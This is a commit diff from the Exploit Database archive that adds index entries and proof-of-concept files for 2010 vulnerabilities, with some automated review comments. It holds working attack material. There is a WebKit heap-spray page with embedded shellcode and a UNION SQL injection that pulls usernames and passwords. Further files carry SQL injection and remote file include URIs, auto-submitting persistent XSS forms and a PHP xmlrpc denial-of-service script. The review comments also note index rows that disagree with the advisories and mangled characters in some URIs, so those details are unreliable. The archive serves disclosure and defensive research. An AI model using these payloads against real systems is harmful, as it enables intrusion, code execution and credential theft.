Updated 06_15_2014

This commit is contained in:
Offensive Security 2014-06-15 04:36:33 +00:00
parent 8c4a59c50c
commit f550d4ce66
11 changed files with 366 additions and 0 deletions


@ -30398,3 +30398,13 @@ id,file,description,date,author,platform,type,port
33741,platforms/hardware/remote/33741.txt,"Yealink VoIP Phone SIP-T38G - Remote Command Execution",2014-06-13,Mr.Un1k0d3r,hardware,remote,0
33742,platforms/hardware/remote/33742.txt,"Yealink VoIP Phone SIP-T38G - Privileges Escalation",2014-06-13,Mr.Un1k0d3r,hardware,remote,0
33743,platforms/php/webapps/33743.py,"ZeroCMS 1.0 - zero_transact_user.php, Handling Privilege Escalation",2014-06-13,"Tiago Carvalho",php,webapps,0
33748,platforms/php/webapps/33748.txt,"AneCMS 1.0 'index.php' Multiple HTML Injection Vulnerabilities",2010-03-11,"pratul agrawal",php,webapps,0
33749,platforms/php/webapps/33749.txt,"ARTIS ABTON CMS Multiple SQL Injection Vulnerabilities",2010-03-11,MustLive,php,webapps,0
33751,platforms/php/webapps/33751.txt,"CodeIgniter 1.0 'BASEPATH' Multiple Remote File Include Vulnerabilities",2010-03-11,eidelweiss,php,webapps,0
33752,platforms/linux/remote/33752.html,"WebKit 1.2.x Right-to-Left Displayed Text Handling Memory Corruption Vulnerability",2010-03-11,wushi,linux,remote,0
33753,platforms/php/webapps/33753.txt,"Easynet4u Forum Host 'topic.php' SQL Injection Vulnerability",2010-03-12,Pr0T3cT10n,php,webapps,0
33754,platforms/php/webapps/33754.txt,"pMyAdmin 3.3.5.1 'db_create.php' Cross Site Scripting Vulnerability",2010-03-12,Liscker,php,webapps,0
33755,platforms/php/dos/33755.php,"PHP <= 5.3.2 xmlrpc Extension Multiple Remote Denial of Service Vulnerabilities",2010-03-12,"Auke van Slooten",php,dos,0
33756,platforms/php/webapps/33756.txt,"Joomla! 'com_seek' Component 'id' Parameter SQL Injection Vulnerability",2010-03-13,"DevilZ TM",php,webapps,0
33757,platforms/php/webapps/33757.txt,"Joomla! 'com_d-greinar' Component 'maintree' Parameter Cross-Site Scripting Vulnerability",2010-03-13,"DevilZ TM",php,webapps,0
33758,platforms/asp/webapps/33758.txt,"Zigurrat Farsi CMS 'manager/textbox.asp' SQL Injection Vulnerability",2010-03-15,Isfahan,asp,webapps,0
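Review bot: Two of the added index rows disagree with the advisory bodies added in the same commit. The `pMyAdmin 3.3.5.1` row for 33754 misspells the product and names a version the 33754 text does not mention (it says phpMyAdmin 3.3.0 is vulnerable), and the 33755 row says `PHP <= 5.3.2` while the 33755 text says PHP 5.3.1 is vulnerable. Either the rows or the advisories should be reconciled before the index is relied on for version matching; I would change the 33754 description to `"phpMyAdmin 3.3.0 'db_create.php' Cross Site Scripting Vulnerability"` and check the 33755 range against the cited BID before settling on one.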



@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/38719/info
Zigurrat Farsi CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/manager/textbox.asp?id='


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/38689/info
WebKit is prone to a remote memory-corruption vulnerability; fixes are available.
Successful exploits may allow the attacker to execute arbitrary code in the context of the application. Failed exploit attempts will result in a denial-of-service condition.
This issue was previously documented in BID 38671 (Apple Safari Prior to 4.0.5 Multiple Security Vulnerabilities) but has been given its own record to better document it.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN"> <HTML lang="en"> <HEAD> <script type="text/javascript">//<![CDATA[ function fuzz_load(){ spray2(); e=document.getElementsByTagName("FORM")[0]; e.previousSibling.dir="rtl"; //e.previousSibling.style="font-size:111px;"; setTimeout('fuzz_timer_0();',1); } function spray2(){ var shellcode ="\uc931\ue983\ud9dd\ud9ee\u2474\u5bf4\u7381\u6f13\ub102\u830e\ufceb\uf4e2\uea93\u0ef5\u026f\u4b3a\u8953\u0bcd\u0317\u855e\u1a20\u513a\u034f\u475a\u36e4\u0f3a\u3381\u9771\u86c3\u7a71\uc368\u037b\uc06e\ufa5a\u5654\u0a95\ue71a\u513a\u034b\u685a\u0ee4\u85fa\u1e30\ue5b0\u1ee4\u0f3a\u8b84\u2aed\uc16b\uce80\u890b\u3ef1\uc2ea\u02c9\u42e4\u85bd\u1e1f\u851c\u0a07\u075a\u82e4\u0e01\u026f\u663a\u5d53\uf880\u540f\uf638\uc2ec\u5eca\u7c07\uec69\u6a1c\uf029\u0ce5\uf1e6\u6188\u62d0\u2c0c\u76d4\u020a\u0eb1" ; var spray = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090"); do { spray += spray; } while(spray.length < 0xc0000); memory = new Array(); for(i = 0; i < 50; i++) memory[i] = spray + shellcode; } function calc(){ var s0 ="\uc931\ue983\ud9dd\ud9ee\u2474\u5bf4\u7381\u6f13\ub102\u830e\ufceb\uf4e2\uea93\u0ef5\u026f\u4b3a\u8953\u0bcd\u0317\u855e\u1a20\u513a\u034f\u475a\u36e4\u0f3a\u3381\u9771\u86c3\u7a71\uc368\u037b\uc06e\ufa5a\u5654\u0a95\ue71a\u513a\u034b\u685a\u0ee4\u85fa\u1e30\ue5b0\u1ee4\u0f3a\u8b84\u2aed\uc16b\uce80\u890b\u3ef1\uc2ea\u02c9\u42e4\u85bd\u1e1f\u851c\u0a07\u075a\u82e4\u0e01\u026f\u663a\u5d53\uf880\u540f\uf638\uc2ec\u5eca\u7c07\uec69\u6a1c\uf029\u0ce5\uf1e6\u6188\u62d0\u2c0c\u76d4\u020a\u0eb1" ; var addr1= unescape("%u9090%u9090"); var addr2= "\uc5c6\uc7c9"; var addr3="\u543d\u4044\u3a7a\u4361\u5977\u696c\u2566\u4151\u5371\u275e\u4c48\u5252\u5b38\u4c44\u742d\u5827\u6a7a\u6644\u2647\u4e4a\u6565\u6825\u332e\u232d\u7456\u406d\u6630\u6841\u524c\u2955\u242b\u3c21\u4628\u3e50\u687d\u7e58\u313d\u6653\u3e2c\u3468\u2d42\u464a\u7361\u5430\u3051"; var 
addr4="\u543d\u4044\u3a7a\u4361\u5977\u696c\u2566\u4151\u5371\u275e\u4c48\u5252\u5b38\u4c44\u742d\u5827\u6a7a\u6644\u2647\u4e4a\u6565\u6825\u332e\u232d\u7456\u406d\u6630\u6841\u524c\u2955\u242b\u3c21\u4628\u3e50\u687d\u7e58\u313d\u6653\u3e2c\u3468\u2d42\u464a\u7361\u5430\u3051"; var addr5="\u543d\u4044\u3a7a\u4361\u5977\u696c\u2566\u4151\u5371\u275e\u4c48\u5252\u5b38\u4c44\u742d\u5827\u6a7a\u6644\u2647\u4e4a\u6565\u6825\u332e\u232d\u7456\u406d\u6630\u6841\u524c\u2955\u242b\u3c21\u4628\u3e50\u687d\u7e58\u313d\u6653\u3e2c\u3468\u2d42\u464a\u7361\u5430\u3051"; var addr6="\u543d\u4044\u3a7a\u4361\u5977\u696c\u2566\u4151\u5371\u275e\u4c48\u5252\u5b38\u4c44\u742d\u5827\u6a7a\u6644\u2647\u4e4a\u6565\u6825\u332e\u232d\u7456\u406d\u6630\u6841\u524c\u2955\u242b\u3c21\u4628\u3e50\u687d\u7e58\u313d\u6653\u3e2c\u3468\u2d42\u464a\u7361\u5430\u3051"; } function fuzz_timer_0(){ e=document.getElementsByTagName("NOBR")[0]; e.innerHTML=''; calc(); document.lastChild.normalize(); } //]]> </script> <code>1111 <AREA>13333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333 <FORM > <NOBR /><BIG /> </FORM> </AREA> </code> </A> </HEAD> <BODY dir="rtl" onload="fuzz_load();"> </BODY> </HTML>
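Review bot: The script in the HTML PoC assigns `e`, `memory` and `i` without `var`, so they become implicit globals, and `setTimeout('fuzz_timer_0();',1)` passes a string that the browser evaluates as code; `setTimeout(fuzz_timer_0, 1);` plus `var` declarations would keep the same behaviour with less surprise. The whole file is rendered here as a single collapsed line, so the hunk's line structure cannot be checked from this page. The `calc()` locals `s0` and `addr1` through `addr6` are assigned but never read in the visible code; if they are intentionally retained, a one-line comment saying why would help the next reader, otherwise they read as dead code.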

14
platforms/php/dos/33755.php Executable file

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/38708/info
PHP's xmlrpc extension library is prone to multiple denial-of-service vulnerabilities because it fails to properly handle crafted XML-RPC requests.
Exploiting these issues allows remote attackers to cause denial-of-service conditions in the context of an application using the vulnerable library.
PHP 5.3.1 is vulnerable; other versions may also be affected.
<?php
$req = '<?xml version="1.0"?>
<methodCall>
</methodCall>';
$result = xmlrpc_decode_request( $req, $frop );
?>

273
platforms/php/webapps/33748.txt Executable file

@ -0,0 +1,273 @@
source: http://www.securityfocus.com/bid/38657/info
AneCMS is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
AneCMS 1.0 is vulnerable; other versions may also be affected.
=======================================================================
ANE CMS 1 Persistent XSS Vulnerability
=======================================================================
by
Pratul Agrawal
# Vulnerability found in- Admin module
# email Pratulag@yahoo.com
# company aksitservices
# Credit by Pratul Agrawal
# Software ANE CMS 1
# Category CMS / Portals
# Plateform php
# Proof of concept #
Targeted URL: http://server/acp/index.php?p=cfg&m=links
In ADD LINKS Field provide the malicious script to store in the Database.
That is-
<html>
<body>
<form name="XYZ" action="http://server/acp/index.php?p=cfg&m=links&id=0" method="post">
<input type=hidden name="name" value=""><script>alert("XSS")</script>">
<input type=hidden name="link" value=""><script>alert("XSS")</script>">
<input type=hidden name="type" value="1">
<input type=hidden name="view" value="0">
</form>
<script>
document.XYZ.submit();
</script>
</body>
</html>
=======================================================================
Request -
=======================================================================
POST /acp/index.php?p=cfg&m=links&id=0 HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://server/acp/index.php?p=cfg&m=links
Cookie: PHPSESSID=200fecb6b36334b983ebe251d11a5df9
Content-Type: application/x-www-form-urlencoded
Content-Length: 41
name="><script>alert("XSS")</script>&link="><script>alert("XSS")</script>&type=1&view=0
=======================================================================
=======================================================================
Response-
=======================================================================
HTTP/1.1 200 OK
Date: Thu, 11 Mar 2010 06:59:03 GMT
Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset: utf-8
Content-Length: 7771
&#65279;&#65279;<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Transdmin Light</title>
<!-- CSS -->
<link href="./skins/aaa/css/transdmin.css" rel="stylesheet" type="text/css" media="screen" />
<!--[if IE 6]><link rel="stylesheet" type="text/css" media="screen" href="./skins/aaa/css/ie6.css" /><![endif]-->
<!--[if IE 7]><link rel="stylesheet" type="text/css" media="screen" href="./skins/aaa/css/ie7.css" /><![endif]-->
<!-- JavaScripts-->
<link rel="stylesheet" type="text/css" href="http://server/system/js/jquery.jgrowl.css" media="screen"/> <script type="text/javascript" src="http://server/system/js/jquery-1.3.2.min.js"></script><script type="text/javascript" src="http://server/system/js/jquery.jgrowl_minimized.js"></script>
<style>div.jGrowl div.green {
background-color: #00D400;
color: navy;
}</style>
</head>
<body>
<div id="wrapper">
<!-- h1 tag stays for the logo, you can use the a tag for linking the index page -->
<h1><a href="#"><span>Administration</span></a></h1>
<!-- You can name the links with lowercase, they will be transformed to uppercase by CSS, we prefered to name them with uppercase to have the same effect with disabled stylesheet -->
<ul id="mainNav">
<li><a href="index.php">Dashboard</a></li>
<li><a href="?p=cfg">Configuration</a></li>
<li><a href="?p=tpl">Design</a></li>
<li><a href="?p=mod">Modules</a></li>
<li class="logout"><a href="#">Logout Admin</a></li>
<li class="logout"><a href="../index.php">CMS</a></li>
</ul>
<!-- // #end mainNav -->
<div id="containerHolder">
<div id="container">
<div id="sidebar">
<ul class="sideNav">
<li><a href="?p=cfg">Show Setting</a></li>
<li><a href="?p=cfg&m=mod">Modify Setting</a></li>
<li><a href="?p=cfg&m=links">Links Management</a></li>
<li><a href="?p=cfg&m=reposerver">Repository Server</a></li>
</ul>
</div>
<h2><a href="#">Configuration</a> » <a href="#" class="active">Links</a></h2>
<div id="main"><br>
<form action="?p=cfg&m=links&id=0" class="jNice" method="POST">
<h3>Aggiungi un nuovo Link</h3>
<fieldset><p><label>Nome link:</label><input type="text" class="text-long" name="name" value=""/></p>
<p><label>Nome link:</label><input type="text" class="text-long" name="link" value=""/></p>
<p><label>Tipo Link:</label><input type="radio" name="type" value="1" checked>Barra Links <input type="radio" name="type" value="2">Menu Links</p>
<p><label>Accesso:</label>
<select name="view">
<option value="0">Visible only to guests</option>
<option value="1">Visible to all</option>
<option value="2">Visible only to members</option>
<option value="3">Visible only to admins</option>
</select>
</p>
<input type="submit" value="Send" />
</fieldset>
</form>
<table cellpadding="0" cellspacing="0">
<tr>
<td>Name</td>
<td>Link</td>
<td>Options</td>
</tr>
<tr><td colspan="4">Bar Links</td></tr>
<tr class="odd">
<td>Home</td>
<td>index.php</td>
<td><a href="?p=cfg&m=links&a=modify&id=1">Modify</a> <a href="?p=cfg&m=links&a=delete&id=1">Delete</a> <a href="?p=cfg&m=links&a=move&type=down&id=1">Move Down</a></td>
</tr>
<tr class="odd">
<td>Blog</td>
<td>blog</td>
<td><a href="?p=cfg&m=links&a=modify&id=2">Modify</a> <a href="?p=cfg&m=links&a=delete&id=2">Delete</a> <a href="?p=cfg&m=links&a=move&type=up&id=2">Move up</a> <a href="?p=cfg&m=links&a=move&type=down&id=2">Move Down</a></td>
</tr>
<tr class="odd">
<td>Registrati</td>
<td>register</td>
<td><a href="?p=cfg&m=links&a=modify&id=4">Modify</a> <a href="?p=cfg&m=links&a=delete&id=4">Delete</a> <a href="?p=cfg&m=links&a=move&type=up&id=4">Move up</a> <a href="?p=cfg&m=links&a=move&type=down&id=4">Move Down</a></td>
</tr>
<tr class="odd">
<td>ACP</td>
<td>acp</td>
<td><a href="?p=cfg&m=links&a=modify&id=5">Modify</a> <a href="?p=cfg&m=links&a=delete&id=5">Delete</a> <a href="?p=cfg&m=links&a=move&type=up&id=5">Move up</a> <a href="?p=cfg&m=links&a=move&type=down&id=5">Move Down</a></td>
</tr>
<tr class="odd">
<td>Widgets</td>
<td>index.php?modifywidgets</td>
<td><a href="?p=cfg&m=links&a=modify&id=6">Modify</a> <a href="?p=cfg&m=links&a=delete&id=6">Delete</a> <a href="?p=cfg&m=links&a=move&type=up&id=6">Move up</a> <a href="?p=cfg&m=links&a=move&type=down&id=6">Move Down</a></td>
</tr>
<tr class="odd">
<td>master</td>
<td>master.asp</td>
<td><a href="?p=cfg&m=links&a=modify&id=38">Modify</a> <a href="?p=cfg&m=links&a=delete&id=38">Delete</a> <a href="?p=cfg&m=links&a=move&type=up&id=38">Move up</a> <a href="?p=cfg&m=links&a=move&type=down&id=38">Move Down</a></td>
</tr>
<tr class="odd">
<td>"><script>alert("XSS")</script></td>
<td>"><script>alert("XSS")</script></td>
<td><a href="?p=cfg&m=links&a=modify&id=39">Modify</a> <a href="?p=cfg&m=links&a=delete&id=39">Delete</a> <a href="?p=cfg&m=links&a=move&type=up&id=39">Move up</a> <a href="?p=cfg&m=links&a=move&type=down&id=39">Move Down</a></td>
</tr>
<tr><td colspan="4">Menu Links</td></tr>
<tr class="odd">
<td>home</td>
<td>index.php</td>
<td><a href="?p=cfg&m=links&a=modify&id=14">Modify</a> <a href="?p=cfg&m=links&a=delete&id=14">Delete</a> <a href="?p=cfg&m=links&a=move&type=up&id=14">Move up</a> <a href="?p=cfg&m=links&a=move&type=down&id=14">Move Down</a></td>
</tr>
<tr class="odd">
<td>Blog</td>
<td>blog</td>
<td><a href="?p=cfg&m=links&a=modify&id=19">Modify</a> <a href="?p=cfg&m=links&a=delete&id=19">Delete</a> <a href="?p=cfg&m=links&a=move&type=up&id=19">Move up</a> <a href="?p=cfg&m=links&a=move&type=down&id=19">Move Down</a></td>
</tr>
</table>
<br />
</div>
<!-- // #main -->
<div class="clear"></div>
</div>
<!-- // #container -->
</div>
<!-- // #containerHolder -->
<p id="footer">Feel free to use and customize it. <a href="http://server">Credit is appreciated.</a></p>
</div>
<!-- // #wrapper -->
<script type="text/javascript">
$(function()
{
});</script>
</body>
</html>
=======================================================================
After completion Just Refres the page and the script get executed again and again.
#If you have any questions, comments, or concerns, feel free to contact me.

13
platforms/php/webapps/33749.txt Executable file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/38658/info
ARTIS ABTON CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The following example URIs are available:
http://www.example.com/rus/details/â??+benchmark(10000,md5(now()))+â??/
http://www.example.com/rus/referaty/1'+benchmark(10000,md5(now()))-â??1/
http://www.example.com/rus/â??+benchmark(10000,md5(now()))+â??/
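Review bot: The three example URIs contain the byte sequence `â??` where the original advisory presumably had a quotation character, so the file as committed does not reproduce the source text; this looks like an encoding round-trip error during import rather than content from the BID page. The file should be re-imported with a consistent encoding, or the mangled character replaced with whatever the cited source shows, rather than left as mojibake that a reader cannot interpret.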

10
platforms/php/webapps/33751.txt Executable file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/38672/info
CodeIgniter is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the computer; other attacks are also possible.
CodeIgniter 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/system/database/DB_active_rec.php?BASEPATH=[Shell.txt?]
http://www.example.com/system/database/DB_driver.php?BASEPATH=[Shell.txt?]


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/38697/info
Easynet4u Forum Host is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/SCRIPT_PATH/topic.php?topic=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x3a,password),5,6/**/FROM/**/users/*&forum=0


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/38707/info
phpMyAdmin is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
phpMyAdmin 3.3.0 is vulnerable; other versions may also be affected.
http://www.example.com/phpmyadmin/db_create.php?token=567eb60e7b1692f64df9251ab7ae3934&reload=1&new_db=%3Cscript%3Ealert%28%2Fliscker%2F%29%3B%3C%2Fscript%3E&db_collation=


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/38711/info
The 'com_seek' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?option=com_seek&task=list1&id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/38714/info
The Joomla! 'com_d-greinar' component is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/index.php?option=com_d-greinar&Itemid=11&do=allar&maintree="><script>alert(/DevilZ TM/)</script>